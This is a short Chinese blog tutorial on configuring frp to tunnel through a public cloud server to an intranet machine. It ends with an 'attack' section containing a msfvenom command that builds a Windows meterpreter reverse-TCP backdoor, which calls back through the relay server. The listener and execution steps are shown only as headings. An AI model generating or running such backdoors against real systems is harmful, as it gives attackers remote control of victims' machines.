什么是Frp
Frp 是一个专注于内网穿透的高性能的反向代理应用,支持 TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网。
为什么要使用Frp
通过在具有公网 IP 的节点上部署 frp 服务端,可以轻松地将内网服务穿透到公网。
准备工作
- Frp工具
- 一台外网服务器当做服务端(这里使用的是win阿里云服务器)
- 一台虚拟机当做客户端(这里使用的是忍者)
Frp:https://github.com/fatedier/frp/
开始配置
一. 配置服务端
修改文件frps.ini
默认端口7000客户端通过此端口连接服务端
启动服务端: frps.exe -c frps.ini
二.配置客户端
修改文件frpc.ini
server_port端口需要和服务端的bind_port端口保持一致
服务器将会话从6000端口转发给攻击机的5000端口
启动客户端: frpc.exe -c frpc.ini
三.配置阿里云服务器安全组规则
只添加入方向,出方向默认都是允许的。*
进行攻击
生成后门:
msfvenom -p windows/meterpreter/reverse_tcp lhost=服务端的公网ip lport=6000 -f exe -o frp.exe
配置监听:
执行后门:
版权声明:本文为weixin_68652890原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接和本声明。